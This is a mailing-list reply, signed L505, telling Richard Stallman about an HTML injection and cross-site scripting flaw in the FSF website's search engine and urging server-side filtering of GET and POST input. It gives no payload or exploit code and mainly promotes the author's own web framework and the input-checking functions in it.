Richard Stallman wrote:
I don't personally do most of our web site maintenance, of course.
But I take responsibility for removing this link if it should not be
there.
Can you tell the FSF web programmers to do more checking for HTML/SQL injection vulnerabilities?
I have found a vulnerability with your FSF search engine.

http://z505.com/gng/fsf-gnu-site-easy-to-hack.htm

Your programmers should check POST/GET variables and in many cases only allow alpha numeric characters in by default. Not through javascript but at the server side during processing. Your search engine allows bad characters in.. ones that can damage the site or cause malicious theft of logins or other data through cross site scripting.. by embedding forms/input boxes into the site that post to another domain.

In the framework I develop, this problem is secured by default...
The functions I use for getting a post/get variables, trim malicious attempts.. while the programmer can choose to use the insecure non default raw function if he really needs to:
http://z505.com/cgi-bin/powtils/docs/1.6/idx.cgi?file=getcgivar&unit=pwumain
http://z505.com/cgi-bin/powtils/docs/1.6/idx.cgi?file=getcgivar_s&unit=pwumain

I suggest your web programmers read up on how to secure web programs by reading about what my GetCgiVar functions do, or by finding articles on the net that explain how you have to filter/check each incoming POST/GET request carefully each time.

I would have sent this privately to you, but many people will find this security info useful and humorous. It is my duty to teach people about web security, and only privately mailing you would mean thousands of people that read this list would miss out on learning about HTML injection. Plenty of large popular websites I visit are insecure in this very manner. Since this vulnerability is unfortunately exposed publicly.. fixing it before too many people notice it would be good.

Regards,
L505

Reply via email to